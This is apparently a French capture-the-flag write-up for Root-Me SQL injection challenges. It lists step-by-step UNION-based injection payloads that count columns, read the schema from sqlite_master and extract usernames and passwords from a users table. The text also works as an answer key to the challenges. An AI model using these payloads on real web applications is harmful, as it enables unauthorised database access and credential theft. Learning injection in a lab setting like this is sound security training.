RootME

SQL injection - String

Vérifier le nombre de colonnes autorisées

1’ order by 1--

Vérifier quelles colonnes peuvent être exploitées

1’ union select 1,2--

Trouver les noms des colonnes

1’ union select 1,sql from sqlite_master--

Extraire des informations sensibles

1’ union select username,password FROM users--

Cela extrait les informations des colonnes username et password de la table users.

Vérifier si la base de données est vulnérable

/web-serveur/ch18/?action=news&news_id=3'

Déterminer le nombre de colonnes

id=3 ORDER BY 1,2,3--

Il y a 3 colonnes

Trouver le nom des colonnes

id=3 UNION SELECT 1,2,3 FROM sqlite_master --

Trouver les noms exacts des colonnes

id=3 UNION SELECT 1,sql,3 FROM sqlite_master --

Extraire les informations

id=3 UNION SELECT 1,password,username FROM users --

Last updated 1 year ago